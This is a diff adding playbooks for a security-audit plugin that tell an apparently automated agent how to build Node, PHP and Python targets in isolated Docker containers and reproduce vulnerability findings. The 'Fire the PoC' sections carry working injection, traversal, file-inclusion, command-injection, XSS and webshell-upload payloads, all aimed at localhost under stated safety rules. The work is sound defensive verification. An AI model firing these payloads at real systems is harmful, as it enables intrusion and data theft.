+RUN apt-get update && apt-get install -y --no-install-recommends \
+      ca-certificates curl git python3 make g++ \
+  && rm -rf /var/lib/apt/lists/*
+WORKDIR /app
+# Copy manifests first for layer caching; tolerate missing lockfiles.
+COPY package.json ./
+COPY package-lock.json* pnpm-lock.yaml* yarn.lock* ./
+# Install with whichever lockfile is present (deterministic install per PM).
+RUN if [ -f pnpm-lock.yaml ]; then corepack enable && pnpm install --frozen-lockfile; \
+    elif [ -f yarn.lock ]; then corepack enable && yarn install --frozen-lockfile; \
+    elif [ -f package-lock.json ]; then npm ci; \
+    else npm install; fi
+COPY . .
+# Build if the project defines one (TS compile / bundler); ignore if absent.
+RUN npm run build --if-present
+EXPOSE 3000
+# overridden at run time per framework (see below)
+CMD ["node", "-e", "console.log('set a start command')"]
+EOF
+
+docker build -f /tmp/Dockerfile.$FID --iidfile /tmp/va-$FID.iid \
+  --build-arg DOCKER_BUILDKIT=1 -t $IMG .
+```
+
+Start command depends on how the project runs (bind to `0.0.0.0`, not
+`localhost`, so the mapped port is reachable):
+
+- **Has a `start` script:** `npm start` (or `pnpm start` / `yarn start`). This
+  is the safest default — it is exactly how the project boots.
+- **Express/Koa/Fastify plain entry:** `node dist/index.js` (after build) or
+  `node src/index.js`. For TS without a build step: `npx tsx src/index.ts`.
+- **NestJS:** `node dist/main.js` after `npm run build`; dev: `npm run start:dev`.
+- **Next.js:** `npm run build && npm run start` (prod server on `3000`), or
+  `npm run dev` for the dev server.
+- **Library (no server):** there is nothing to serve — go to Fallbacks and drive
+  the vulnerable API from a unit test (`method: unit-test`).
+
+Most frameworks honor `PORT` (env) and/or `HOST`. Pass `-e PORT=3000 -e HOST=0.0.0.0`
+when the app reads them; otherwise the in-container port is whatever the code
+hardcodes — read the listen() call to confirm.
+
+---
+
+## 4. Dependencies
+
+Install reproducibly from the lockfile (done in the image above; the standalone
+forms, e.g. for the Fallbacks test runs):
+
+```sh
+npm ci                 # package-lock.json — clean, lockfile-exact
+pnpm install --frozen-lockfile
+yarn install --frozen-lockfile
+npm install            # only if there is no lockfile at all
+```
+
+- Honor the lockfile exactly; do **not** `npm update` / bump versions (that
+  changes the audited dependency set).
+- Native addon build failures (`node-gyp`, `bcrypt`, `sharp`, `sqlite3`) → the
+  image already ships `python3 make g++`; add `-dev` libs only if a specific
+  module needs them.
+- `postinstall` scripts run by default during install. That is intended here
+  (the audited project would run them too) — but it is also why the build must
+  stay in the container, never on the host.
+- TypeScript that is run directly (no build script) needs `tsx`/`ts-node`
+  available; `npx tsx` fetches it on demand inside the container.
+
+---
+
+## 5. Run & health-check
+
+Pick a free ephemeral host port keyed to the finding, then run detached with a
+unique name:
+
+```sh
+PORT=$(python3 -c 'import socket;s=socket.socket();s.bind(("",0));print(s.getsockname()[1]);s.close()')
+
+docker run -d --name $CN -p 127.0.0.1:$PORT:3000 \
+  -e NODE_ENV=development -e PORT=3000 -e HOST=0.0.0.0 \
+  $IMG npm start
+```
+
+Bind the host port to `127.0.0.1` so the app is never exposed off-box. Adjust
+the container port (`:3000`) and the start command per framework. If the app
+hardcodes a different listen port, map that instead (`-p 127.0.0.1:$PORT:8080`).
+
+Confirm it is up (poll, don't sleep blindly):
+
+```sh
+for i in $(seq 1 30); do
+  curl -fsS -o /dev/null "http://127.0.0.1:$PORT/" && { echo up; break; }
+  sleep 1
+done
+docker logs --tail 50 $CN          # inspect boot errors if curl never succeeds
+```
+
+Common in-container ports: Express/Nest/Next **3000**, Fastify **3000**
+(default), but always confirm from the `listen()` call / `PORT` env. A 404 on
+`/` still means the server is up — any TCP response counts as healthy; look for
+the framework's boot log line (`Listening on`, `Nest application successfully
+started`, `ready - started server on`).
+
+---
+
+## 6. Seed
+
+Only seed what the PoC needs; keep it minimal and synthetic.
+
+- **DB-backed app:** run the project's own migration/seed scripts inside the
+  container (read `package.json` scripts for the real names):
+
+  ```sh
+  docker exec $CN npm run migrate --if-present
+  docker exec $CN sh -c 'npx prisma migrate deploy 2>/dev/null || npx sequelize-cli db:migrate 2>/dev/null || true'
+  docker exec $CN npm run seed --if-present
+  ```
+
+- **Auth flow:** if the PoC needs a session/token, register or log in via the
+  app's own endpoint with synthetic creds and keep the cookie jar / capture the
+  token:
+
+  ```sh
+  # Cookie-session apps:
+  curl -s -c /tmp/jar.$FID -b /tmp/jar.$FID \
+    -H 'Content-Type: application/json' \
+    -d '{"email":"poc@local.test","password":"Poc-Passw0rd!"}' \
+    "http://127.0.0.1:$PORT/login"
+
+  # JWT/bearer apps — capture the token for the Authorization header:
+  TOKEN=$(curl -s -H 'Content-Type: application/json' \
+    -d '{"email":"poc@local.test","password":"Poc-Passw0rd!"}' \
+    "http://127.0.0.1:$PORT/auth/login" | node -e 'process.stdin.on("data",d=>{try{console.log(JSON.parse(d).token||JSON.parse(d).accessToken)}catch(e){}})')
+  ```
+
+- Use only fake, local-only credentials. Never reuse real secrets from the repo
+  beyond what is strictly required to boot.
+
+---
+
+## 7. Fire the PoC safely
+
+Send the exploit to the **local** container only and capture concrete evidence.
+Tailor to the finding's source→sink path; examples per class:
+
+```sh
+# SQL/NoSQL injection — observe error or extracted marker in the response:
+curl -s -b /tmp/jar.$FID "http://127.0.0.1:$PORT/search?q=%27%20OR%201=1--" | tee /tmp/poc.$FID.out
+# NoSQL operator injection (Mongo) — JSON body that smuggles an operator:
+curl -s -H 'Content-Type: application/json' \
+  -d '{"username":"admin","password":{"$ne":null}}' "http://127.0.0.1:$PORT/login"
+
+# Path traversal / arbitrary file read — pull a host file the app should never serve:
+curl -s "http://127.0.0.1:$PORT/download?file=../../../../etc/passwd" | head
+
+# Prototype pollution — pollute, then observe the gadget take effect in a later request:
+curl -s -H 'Content-Type: application/json' \
+  -d '{"__proto__":{"polluted":"yes"}}' "http://127.0.0.1:$PORT/<merge-sink>"
+docker exec $CN node -e 'console.log(({}).polluted)'   # only meaningful in-process; prefer an app-observable gadget
+
+# SSRF — point at a CONTAINER-LOCAL listener you control, never a real host:
+docker exec -d $CN sh -c 'node -e "require(\"http\").createServer((q,s)=>s.end(\"CANARY\")).listen(9999)"'
+curl -s "http://127.0.0.1:$PORT/fetch?url=http://127.0.0.1:9999/"
+
+# Command injection / RCE — prove exec via a benign in-container sentinel, then read it back
+# (NEVER run destructive commands):
+curl -s "http://127.0.0.1:$PORT/ping?host=127.0.0.1;touch%20/tmp/va-pwned"
+docker exec $CN ls -l /tmp/va-pwned 2>&1
+
+# Reflected/stored XSS — confirm the payload is reflected unescaped in the response body:
+curl -s "http://127.0.0.1:$PORT/profile?name=%3Cscript%3Ealert(1)%3C/script%3E" | grep -o '<script>alert(1)</script>'
+```
+
+Evidence to record for the repro result:
+
+- The exact request (method, path, headers, body) → `poc`.
+- The response/log line proving impact (leaked row, file contents, sentinel
+  file, reflected script, polluted property, 500 with stack) → `observed`.
+- What it means for the target → `impact`. Set `reproduced: true`,
+  `method: live-exploit`.
+
+Safety invariants: traffic stays on `127.0.0.1` / inside `$CN`; no outbound
+connections; no real data; side effects are benign sentinels only.
+
+---
+
+## 8. Teardown
+
+Always clean up, even on failure (idempotent):
+
+```sh
+docker rm -f $CN 2>/dev/null
+docker compose -p va-$FID down -v 2>/dev/null
+docker image rm -f $IMG 2>/dev/null
+rm -f /tmp/jar.$FID /tmp/poc.$FID.out /tmp/Dockerfile.$FID \
+      /tmp/va-$FID.dockerignore /tmp/va-$FID.iid
+
+cd /                                   # leave the worktree before removing it
+git -C <target> worktree remove --force /tmp/va-$FID
+git -C <target> worktree prune
+```
+
+---
+
+## 9. Fallbacks
+
+If a live exploit is not achievable, downgrade deliberately and set `method`
+accordingly (enum: `live-exploit | unit-test | build-only | static-poc`):
+
+1. **Won't serve but builds (library package, or web boot blocked):** drive the
+   vulnerable function directly with a Node test in the container. Set
+   `method: unit-test`.
+
+   ```sh
+   # Run the project's own focused test if one covers the sink:
+   docker run --rm -v "$WT":/app -w /app $IMG sh -c \
+     'npx jest path/to/file.test.js 2>/dev/null || npx vitest run path/to/file.test.ts 2>/dev/null || npx mocha test/<focused>.js'
+
+   # Or a one-off harness that imports the vulnerable API and asserts impact:
+   docker run --rm -v "$WT":/app -w /app $IMG node -e '
+     const m = require("./dist/vulnerable.js");
+     const out = m.parse("<payload>");        // call vulnerable API
+     if (!/<impact-marker>/.test(String(out))) process.exit(1);
+     console.log("IMPACT:", out);'
+   # TypeScript source (no build): swap `node -e` for `npx tsx -e` / `npx ts-node -e`.
+   ```
+
+2. **Image builds but the app can't start (missing DB/config/env, native addon):**
+   record that the dependency set installs, the build succeeds, and the
+   vulnerable code is present and reachable, with the source→sink trace as
+   evidence. Set `method: build-only`.
+
+3. **Cannot build at all (toolchain/network blocked):** construct a static PoC —
+   the exact crafted input plus the line-referenced source→sink path showing why
+   it triggers. Set `method: static-poc`, `reproduced: false`.
+
+Prefer the highest-fidelity rung that actually works; never claim
+`reproduced: true` without observed runtime evidence.
diff --git a/plugins/security/prompts/playbooks/php.md b/plugins/security/prompts/playbooks/php.md
new file mode 100644
index 0000000..0c623d0
--- /dev/null
+++ b/plugins/security/prompts/playbooks/php.md
@@ -0,0 +1,399 @@
+# ENV Playbook — PHP
+
+Build, run, and exploit a PHP target (Laravel / Symfony / WordPress / Slim /
+plain package) to reproduce a candidate finding with a real PoC. Docker-first;
+the native PHP toolchain (php, composer) may be absent on the host. Keep ALL
+traffic inside the local container — no external hosts, no real credentials, no
+data exfiltration.
+
+Conventions used below (substitute per finding):
+
+- `FID` — the finding id (e.g. `f3`); use it to make names/ports unique so
+  parallel repros never collide.
+- `WT=/tmp/va-$FID` — isolated git worktree path.
+- `IMG=va-$FID:repro` — image tag. `CN=va-$FID` — container name.
+- `PORT` — an ephemeral host port (pick a free one, see Run & health-check).
+- The final repro result must set `method` to one of:
+  `live-exploit | unit-test | build-only | static-poc`.
+
+---
+
+## 1. Detect
+
+Confirm the stack from the target tree (read-only):
+
+```sh
+ls composer.json composer.lock artisan symfony.lock wp-config.php \
+   wp-load.php index.php public/index.php 2>/dev/null
+find . -maxdepth 3 -name '*.php' -not -path '*/vendor/*' | head
+```
+
+- **Manifests:** `composer.json` (almost always; defines deps + `autoload` +
+  `require-php`), `composer.lock` (pins exact versions — restore from this). No
+  composer at all → a legacy/WordPress tree driven only by `*.php` + an include
+  graph.
+- **Framework tells** (read `composer.json` `require`, or the entrypoint):
+  - Laravel → `laravel/framework` dep, an `artisan` CLI, `public/index.php`,
+    `routes/web.php` / `routes/api.php`, config under `config/`, `.env`.
+  - Symfony → `symfony/framework-bundle`, `symfony.lock`, `bin/console`,
+    `public/index.php`, routes in `config/routes*` or attributes.
+  - Slim / Lumen / Mezzio → `slim/slim`, `laravel/lumen-framework`,
+    `mezzio/mezzio`; small `public/index.php` bootstrap.
+  - WordPress → `wp-config.php` / `wp-load.php`, `wp-content/` (plugins/themes
+    are the usual finding site); often no `composer.json`.
+  - Plain package / library (no web entry) → `composer.json` with `autoload`
+    PSR-4 and no front controller. Drive it from a test (see Fallbacks).
+- **Entry point:** the web root is the dir holding the front controller —
+  `public/index.php` (Laravel/Symfony/Slim) or `index.php` at the repo root
+  (WordPress/legacy). That dir is the docroot for the server.
+- **PHP version:** `require.php` in `composer.json`, a `.php-version`, or a
+  platform pin under `config.platform.php` in `composer.json`. Match the image
+  tag to it (PHP minor matters for syntax + extension ABI).
+
+```sh
+php -r 'echo json_encode(json_decode(file_get_contents("composer.json"))->require ?? new stdClass);' 2>/dev/null \
+  || grep -E '"(php|laravel/framework|symfony/framework-bundle|slim/slim)"' composer.json
+cat .php-version 2>/dev/null
+```
+
+---
+
+## 2. Isolate
+
+Work in a throwaway git worktree at the target ref so the original tree is
+never touched. From inside the target repo:
+
+```sh
+REF=<commit-or-branch>            # the ref under audit; default HEAD
+git -C <target> worktree add --detach /tmp/va-$FID "$REF"
+cd /tmp/va-$FID
+```
+
+If `<target>` is not a git repo (rare), `cp -a <target> /tmp/va-$FID` instead
+and note it. All build/run steps below run from `WT=/tmp/va-$FID`.
+
+Never copy a host `vendor/` into the build — it may carry platform-specific
+state and stale autoload maps. Let the container install fresh; keep it (and the
+local env) out of the build context:
+
+```sh
+printf 'vendor\n.env\n.git\nnode_modules\nstorage/logs/*\n' > /tmp/va-$FID.dockerignore
+```
+
+---
+
+## 3. Build & run (docker-first)
+
+### 3a. If the repo ships its own Docker
+
+Prefer the project's own definition — it usually wires up DB, env, the right PHP
+extensions, and the correct start command (php-fpm + nginx, or a CLI server) for
+you.
+
+```sh
+# Compose (opportunistic — the plugin may be missing):
+docker compose version >/dev/null 2>&1 && \
+  docker compose -p va-$FID up -d --build
+
+# Otherwise plain docker with the repo Dockerfile (the reliable path):
+docker build -t $IMG .
+```
+
+### 3b. No Dockerfile — minimal generic image
+
+Pick the PHP tag from step 1 (fall back to a recent stable, e.g. `php:8.3-cli`).
+The `*-cli` image plus PHP's built-in web server is the simplest way to serve an
+app for a PoC; `php:8.3-apache` is the alternative when the app expects Apache
+rewrite rules. Install the extensions the app needs (read `composer.json`
+`require` for `ext-*`) — `pdo_mysql`, `pdo_pgsql`, `mbstring`, `intl`, `gd`,
+`zip`, `bcmath`, `sodium` are the common ones.
+
+```sh
+cat > /tmp/Dockerfile.$FID <<'EOF'
+FROM php:8.3-cli
+RUN apt-get update && apt-get install -y --no-install-recommends \
+      git unzip curl libzip-dev libicu-dev libpq-dev libonig-dev \
+      libpng-dev libjpeg-dev libxml2-dev \
+  && docker-php-ext-configure gd --with-jpeg \
+  && docker-php-ext-install -j"$(nproc)" \
+      pdo_mysql pdo_pgsql mbstring intl gd zip bcmath \
+  && rm -rf /var/lib/apt/lists/*
+# Composer from the official image (pinned, no host toolchain needed):
+COPY --from=composer:2 /usr/bin/composer /usr/bin/composer
+WORKDIR /app
+# Manifests first for layer caching; install without dev/scripts at build time.
+COPY composer.json composer.lock* ./
+RUN composer install --no-interaction --no-scripts --no-autoloader --prefer-dist \
+      --no-progress 2>/dev/null || true
+COPY . .
+RUN composer dump-autoload --optimize 2>/dev/null || true
+EXPOSE 8000
+# overridden at run time per framework (see below)
+CMD ["php", "-v"]
+EOF
+
+docker build -f /tmp/Dockerfile.$FID -t $IMG .
+```
+
+Start command depends on the framework (bind to `0.0.0.0`, not `localhost`, so
+the mapped port is reachable):
+
+- **Laravel:** `php artisan serve --host=0.0.0.0 --port=8000`. Needs an `APP_KEY`
+  — generate one at boot (see Run & health-check). Docroot is `public/`.
+- **Symfony:** `php -S 0.0.0.0:8000 -t public public/index.php` (built-in
+  server), or `symfony serve` if the Symfony CLI is present. Set
+  `APP_ENV=dev APP_DEBUG=1` so it boots without prod secrets.
+- **Slim / Lumen / Mezzio / plain front controller:**
+  `php -S 0.0.0.0:8000 -t public` (or `-t .` if `index.php` is at the root).
+- **WordPress / legacy (root `index.php`):** `php -S 0.0.0.0:8000 -t .` for a
+  quick serve; if it relies on `.htaccess` rewrites, use the `php:8.3-apache`
+  image instead (docroot `/var/www/html`, port 80).
+- **Library / package (no front controller):** there is nothing to serve — go to
+  Fallbacks and drive the vulnerable API from a test (`method: unit-test`).
+
+> PHP's built-in server is single-threaded: a PoC that needs the app to make a
+> second request to itself (some SSRF/webhook flows) can deadlock. For those,
+> use `php -S ... &` plus a second worker, or the apache image.
+
+---
+
+## 4. Dependencies
+
+Restore from the lockfile — do **not** upgrade, that changes the audited
+dependency set. Inside the container (or in the build):
+
+```sh
+# Lockfile present (the common, reproducible case):
+composer install --no-interaction --prefer-dist --no-progress
+
+# Build-time split used in the image (deps without running project scripts,
+# then the autoloader) — safe when post-install scripts need a full app/env:
+composer install --no-interaction --no-scripts --no-autoloader --prefer-dist
+composer dump-autoload --optimize
+
+# No composer.json at all (WordPress/legacy): nothing to restore — the include
+# graph is the code under test; just serve the tree.
+```
+
+- Honor `composer.lock` exactly. Avoid `composer update` / version bumps.
+- `--no-scripts` at build time avoids post-install hooks that need a DB or
+  `.env` (e.g. Laravel package discovery); re-run them at run time once the app
+  is configured: `composer run-script post-autoload-dump` or
+  `php artisan package:discover`.
+- Composer post-install/autoload scripts run real project code. That is intended
+  here (the audited project runs them too) — which is exactly why the install
+  must stay in the disposable container, never on the host.
+- Platform mismatch (`require-php`, `ext-*`) → match the image tag and add the
+  missing `docker-php-ext-install <ext>`. `--ignore-platform-reqs` is a last
+  resort and changes behavior — note it if used.
+- WordPress plugin/theme findings: drop the plugin/theme into a stock WP install
+  (see Seed) rather than serving it standalone.
+
+---
+
+## 5. Run & health-check
+
+Pick a free ephemeral host port keyed to the finding, then run detached with a
+unique name:
+
+```sh
+PORT=$(python3 -c 'import socket;s=socket.socket();s.bind(("",0));print(s.getsockname()[1]);s.close()')
+
+# Laravel example (generate a key and serve; bind inside the container to 0.0.0.0):
+docker run -d --name $CN -p 127.0.0.1:$PORT:8000 \
+  -e APP_ENV=local -e APP_DEBUG=true \
+  $IMG sh -c 'cp -n .env.example .env 2>/dev/null; \
+    php artisan key:generate --force 2>/dev/null; \
+    php artisan serve --host=0.0.0.0 --port=8000'
+
+# Symfony / Slim / plain front controller:
+# docker run -d --name $CN -p 127.0.0.1:$PORT:8000 -e APP_ENV=dev -e APP_DEBUG=1 \
+#   $IMG php -S 0.0.0.0:8000 -t public public/index.php
+```
+
+Bind the host port to `127.0.0.1` so the app is never exposed off-box. Adjust
+the container port (`:8000`) and the start command per framework. For the apache
+image map port 80 instead (`-p 127.0.0.1:$PORT:80`).
+
+Confirm it is up (poll, don't sleep blindly):
+
+```sh
+for i in $(seq 1 30); do
+  curl -fsS -o /dev/null "http://127.0.0.1:$PORT/" && { echo up; break; }
+  sleep 1
+done
+docker logs --tail 50 $CN          # inspect boot errors if curl never succeeds
+```
+
+Common in-container ports: `php artisan serve` / `php -S` examples here **8000**
+(whatever you pass), the apache image **80**, `symfony serve` **8000**. A 404 or
+even a Laravel/Symfony error page at `/` still means the server is up — any HTTP
+response counts as healthy; look for `Development Server (http://0.0.0.0:8000)
+started` in the logs.
+
+---
+
+## 6. Seed
+
+Only seed what the PoC needs; keep it minimal and synthetic.
+
+- **Laravel DB:** the default `sqlite` driver needs no external DB — point at a
+  file and migrate inside the container:
+
+  ```sh
+  docker exec $CN sh -c 'touch database/database.sqlite'
+  docker exec $CN php artisan migrate --force
+  # synthetic user via tinker (substitute the real User model if namespaced):
+  docker exec $CN php artisan tinker --execute \
+    'App\Models\User::firstOrCreate(["email"=>"poc@local.test"],["name"=>"poc","password"=>bcrypt("Poc-Passw0rd!")]);'
+  docker exec $CN php artisan db:seed --force 2>/dev/null || true
+  ```
+
+  If the app hardcodes mysql/pgsql, run a sidecar on a private network and point
+  `DB_HOST` at it: `docker network create va-$FID-net` then
+  `docker run -d --name $CN-db --network va-$FID-net -e MYSQL_ROOT_PASSWORD=poc \
+   -e MYSQL_DATABASE=app mysql:8` and add `--network va-$FID-net -e DB_HOST=$CN-db`
+  to the app `run`.
+
+- **Symfony DB:** `php bin/console doctrine:database:create --if-not-exists` then
+  `php bin/console doctrine:migrations:migrate --no-interaction`; create a user
+  via a fixture (`doctrine:fixtures:load --no-interaction`) or a one-off
+  `bin/console` command.
+
+- **WordPress:** seed a stock install with WP-CLI inside the container:
+  `wp core install --url=http://127.0.0.1:$PORT --title=poc --admin_user=poc
+   --admin_password=Poc-Passw0rd! --admin_email=poc@local.test`, then
+  `wp plugin activate <slug>` (or `wp theme activate`) for the code under test.
+
+- **Auth flow:** if the PoC needs a session, log in via the app's own login route
+  with the seeded creds and keep the cookie jar. Laravel/Symfony forms require a
+  CSRF token — fetch the login page, scrape the token, then post:
+
+  ```sh
+  # Laravel: token is in a hidden _token input (and the XSRF cookie):
+  TOKEN=$(curl -s -c /tmp/jar.$FID "http://127.0.0.1:$PORT/login" \
+    | grep -oP 'name="_token"[^>]*value="\K[^"]+')
+  curl -s -c /tmp/jar.$FID -b /tmp/jar.$FID -L \
+    -d "_token=$TOKEN&email=poc@local.test&password=Poc-Passw0rd!" \
+    "http://127.0.0.1:$PORT/login"
+  ```
+
+  Token/API apps (Sanctum/Passport/JWT): POST creds to the token endpoint,
+  capture the returned token, send it as `Authorization: Bearer <tok>`.
+
+- Use only fake, local-only credentials. Never reuse real secrets from the repo
+  beyond what is strictly required to boot.
+
+---
+
+## 7. Fire the PoC safely
+
+Send the exploit to the **local** container only and capture concrete evidence.
+Tailor to the finding's source→sink path; examples per class:
+
+```sh
+# SQL injection — observe error or extracted marker in the response:
+curl -s -b /tmp/jar.$FID "http://127.0.0.1:$PORT/search?q=%27%20OR%201=1--%20" | tee /tmp/poc.$FID.out
+
+# Path traversal / arbitrary file read — pull a host file the app should never serve:
+curl -s "http://127.0.0.1:$PORT/download?file=../../../../etc/passwd" | head
+
+# Local/Remote file inclusion (include/require on user input) — prove inclusion
+# via the php:// filter to leak source, or include an in-container sentinel:
+curl -s "http://127.0.0.1:$PORT/?page=php://filter/convert.base64-encode/resource=index" | head
+docker exec $CN sh -c 'echo "<?php echo 92657*1; ?>" > /tmp/lfi.php'
+curl -s "http://127.0.0.1:$PORT/?page=/tmp/lfi" | grep -o 92657
+
+# PHP object injection (unserialize on user input) — send a crafted serialized
+# payload that triggers a benign in-container gadget (touch a sentinel):
+curl -s --data-urlencode "data=$(cat /tmp/payload.$FID)" "http://127.0.0.1:$PORT/<sink>"
+docker exec $CN ls -l /tmp/va-pwned 2>&1
+
+# Command injection / RCE (shell_exec/exec/system on input) — benign sentinel:
+curl -s "http://127.0.0.1:$PORT/ping?host=127.0.0.1;touch%20/tmp/va-pwned"
+docker exec $CN ls -l /tmp/va-pwned 2>&1
+
+# SSRF — point at a CONTAINER-LOCAL listener you control, never a real host:
+docker exec -d $CN php -S 127.0.0.1:9999 -t /tmp   # canary in-container
+curl -s "http://127.0.0.1:$PORT/fetch?url=http://127.0.0.1:9999/"
+
+# Reflected/stored XSS — confirm the payload is reflected unescaped:
+curl -s "http://127.0.0.1:$PORT/profile?name=%3Cscript%3Ealert(1)%3C/script%3E" \
+  | grep -o '<script>alert(1)</script>'
+
+# Unrestricted file upload → webshell — upload, then request the dropped file
+# and confirm it executed an in-container sentinel (NEVER a real shell):
+curl -s -b /tmp/jar.$FID -F 'file=@/tmp/shell.$FID;type=image/png;filename=poc.php' \
+  "http://127.0.0.1:$PORT/upload"
+curl -s "http://127.0.0.1:$PORT/uploads/poc.php?c=id" | head
+```
+
+Evidence to record for the repro result:
+
+- The exact request (method, path, headers, body) → `poc`.
+- The response/log line proving impact (leaked row, file contents, decoded
+  source, sentinel file, reflected script, 500 with stack/whoops page) →
+  `observed`.
+- What it means for the target → `impact`. Set `reproduced: true`,
+  `method: live-exploit`.
+
+Safety invariants: traffic stays on `127.0.0.1` / inside `$CN` (and any sidecar
+DB on a private `va-$FID-net`); no outbound connections; no real data; side
+effects are benign sentinels only.
+
+---
+
+## 8. Teardown
+
+Always clean up, even on failure (idempotent):
+
+```sh
+docker rm -f $CN $CN-db 2>/dev/null
+docker compose -p va-$FID down -v 2>/dev/null
+docker network rm va-$FID-net 2>/dev/null
+docker image rm -f $IMG 2>/dev/null
+rm -f /tmp/jar.$FID /tmp/poc.$FID.out /tmp/Dockerfile.$FID \
+      /tmp/va-$FID.dockerignore /tmp/payload.$FID /tmp/shell.$FID
+
+cd /                                   # leave the worktree before removing it
+git -C <target> worktree remove --force /tmp/va-$FID
+git -C <target> worktree prune
+```
+
+---
+
+## 9. Fallbacks
+
+If a live exploit is not achievable, downgrade deliberately and set `method`
+accordingly (enum: `live-exploit | unit-test | build-only | static-poc`):
+
+1. **Won't serve but builds (library/package, or web boot blocked):** drive the
+   vulnerable function directly with a PHP snippet/test in the container, loading
+   the project autoloader. Set `method: unit-test`.
+
+   ```sh
+   # Run the project's own focused test if one covers the sink:
+   docker run --rm -v "$WT":/app -w /app $IMG \
+     sh -c './vendor/bin/phpunit --filter <TestName> 2>/dev/null \
+            || ./vendor/bin/pest tests/<Focused>Test.php 2>/dev/null'
+
+   # Or a one-off harness that calls the vulnerable API and asserts impact:
+   docker run --rm -v "$WT":/app -w /app $IMG php -r '
+     require "vendor/autoload.php";
+     $out = (new \Vendor\Pkg\Vuln())->parse("<payload>");   // call vulnerable API
+     if (strpos((string)$out, "<impact-marker>") === false) exit(1);
+     echo "IMPACT: $out\n";'
+   ```
+
+2. **Image builds but the app can't start (missing DB/config/`APP_KEY`/extension):**
+   record that the dependency set installs, the autoloader builds, and the
+   vulnerable code is present and reachable, with the source→sink trace as
+   evidence. Set `method: build-only`.
+
+3. **Cannot build at all (toolchain/network blocked):** construct a static PoC —
+   the exact crafted input (e.g. the serialized object-injection payload, the
+   traversal string) plus the line-referenced source→sink path showing why it
+   triggers. Set `method: static-poc`, `reproduced: false`.
+
+Prefer the highest-fidelity rung that actually works; never claim
+`reproduced: true` without observed runtime evidence.
diff --git a/plugins/security/prompts/playbooks/python.md b/plugins/security/prompts/playbooks/python.md
new file mode 100644
index 0000000..6930f4d
--- /dev/null
+++ b/plugins/security/prompts/playbooks/python.md
@@ -0,0 +1,335 @@
+# ENV Playbook — Python
+
+Build, run, and exploit a Python target (Django / Flask / FastAPI / plain
+package) to reproduce a candidate finding with a real PoC. Docker-first; the
+native Python toolchain may be absent on the host. Keep ALL traffic inside the
+local container — no external hosts, no real credentials, no data exfiltration.
+
+Conventions used below (substitute per finding):
+
+- `FID` — the finding id (e.g. `f3`); use it to make names/ports unique so
+  parallel repros never collide.
+- `WT=/tmp/va-$FID` — isolated git worktree path.
+- `IMG=va-$FID:repro` — image tag. `CN=va-$FID` — container name.
+- `PORT` — an ephemeral host port (pick a free one, see Run & health-check).
+- The final repro result must set `method` to one of:
+  `live-exploit | unit-test | build-only | static-poc`.
+
+---
+
+## 1. Detect
+
+Confirm the stack from the target tree (read-only):
+
+```sh
+ls pyproject.toml requirements*.txt setup.py setup.cfg Pipfile Pipfile.lock \
+   poetry.lock uv.lock manage.py 2>/dev/null
+find . -maxdepth 3 -name '*.py' | head
+```
+
+- **Manifests:** `pyproject.toml` (PEP 621 / poetry / uv / hatch), one or more
+  `requirements*.txt` (pip), `setup.py` / `setup.cfg` (legacy), `Pipfile(.lock)`
+  (pipenv). Lockfiles: `poetry.lock`, `uv.lock`, `Pipfile.lock`.
+- **Framework tells:**
+  - Django → `manage.py`, `*/settings.py`, `wsgi.py`/`asgi.py`, `INSTALLED_APPS`,
+    `urls.py`; `django` in deps.
+  - Flask → `from flask import Flask`, an `app = Flask(__name__)`, often
+    `app.py` / `wsgi.py`; `flask` in deps.
+  - FastAPI → `from fastapi import FastAPI`, `app = FastAPI()`, ASGI; `fastapi`
+    + `uvicorn` in deps.
+  - Plain package / CLI (no web server) → only a `pyproject.toml`/`setup.py`
+    with a library or `console_scripts`, no app object.
+- **Python version:** `.python-version`, `requires-python` in `pyproject.toml`,
+  `python_requires` in `setup.cfg`, or a `runtime.txt`. Match the image to it.
+
+```sh
+cat .python-version 2>/dev/null
+grep -E 'requires-python|python_requires' pyproject.toml setup.cfg 2>/dev/null
+```
+
+---
+
+## 2. Isolate
+
+Work in a throwaway git worktree at the target ref so the original tree is
+never touched. From inside the target repo:
+
+```sh
+REF=<commit-or-branch>            # the ref under audit; default HEAD
+git -C <target> worktree add --detach /tmp/va-$FID "$REF"
+cd /tmp/va-$FID
+```
+
+If `<target>` is not a git repo (rare), `cp -a <target> /tmp/va-$FID` instead
+and note it. All build/run steps below run from `WT=/tmp/va-$FID`.
+
+---
+
+## 3. Build & run (docker-first)
+
+### 3a. If the repo ships its own Docker
+
+Prefer the project's own definition — it usually wires up DB, env, migrations,
+and the correct start command for you.
+
+```sh
+# Compose (opportunistic — the plugin may be missing):
+docker compose version >/dev/null 2>&1 && \
+  docker compose -p va-$FID up -d --build
+
+# Otherwise plain docker with the repo Dockerfile (the reliable path):
+docker build -t $IMG .
+```
+
+### 3b. No Dockerfile — minimal generic image
+
+Pick the Python tag from step 1 (fall back to a recent stable, e.g.
+`python:3.12-slim`). Build deps cover native wheels (`psycopg2`, `cryptography`,
+`lxml`, `mysqlclient`, `Pillow`).
+
+```sh
+cat > /tmp/Dockerfile.$FID <<'EOF'
+FROM python:3.12-slim
+RUN apt-get update && apt-get install -y --no-install-recommends \
+      build-essential git curl libpq-dev libssl-dev libffi-dev \
+      libxml2-dev libxslt1-dev default-libmysqlclient-dev pkg-config \
+  && rm -rf /var/lib/apt/lists/*
+WORKDIR /app
+# Copy manifests first for layer caching (see Dependencies for which apply).
+COPY pyproject.toml requirements*.txt setup.py setup.cfg poetry.lock uv.lock \
+     Pipfile Pipfile.lock ./ 2>/dev/null || true
+RUN pip install --upgrade pip
+COPY . .
+RUN pip install -r requirements.txt 2>/dev/null \
+    || pip install . 2>/dev/null \
+    || true
+EXPOSE 8000
+# overridden at run time per framework (see below)
+CMD ["bash"]
+EOF
+
+docker build -f /tmp/Dockerfile.$FID -t $IMG .
+```
+
+> The `COPY ... 2>/dev/null` glob trick is shell-shorthand; in a real Dockerfile
+> just `COPY . .` and run the dependency restore from §4. The split-copy is only
+> a caching nicety — drop it if any listed manifest is absent.
+
+Start command depends on the framework (set host `PORT`, bind to `0.0.0.0`):
+
+- **Django:** `python manage.py runserver 0.0.0.0:8000`
+  (set `DJANGO_SETTINGS_MODULE` if non-default; provide a dummy
+  `SECRET_KEY=$(openssl rand -hex 32)` and `DEBUG=1` / `ALLOWED_HOSTS=*` so it
+  boots in dev). Production WSGI: `gunicorn <proj>.wsgi:application -b 0.0.0.0:8000`.
+- **Flask:** `flask --app app run --host 0.0.0.0 --port 8000`
+  (or `gunicorn 'app:app' -b 0.0.0.0:8000` / `python app.py` if it self-serves).
+- **FastAPI:** `uvicorn app.main:app --host 0.0.0.0 --port 8000`
+  (substitute the real `module:app` path).
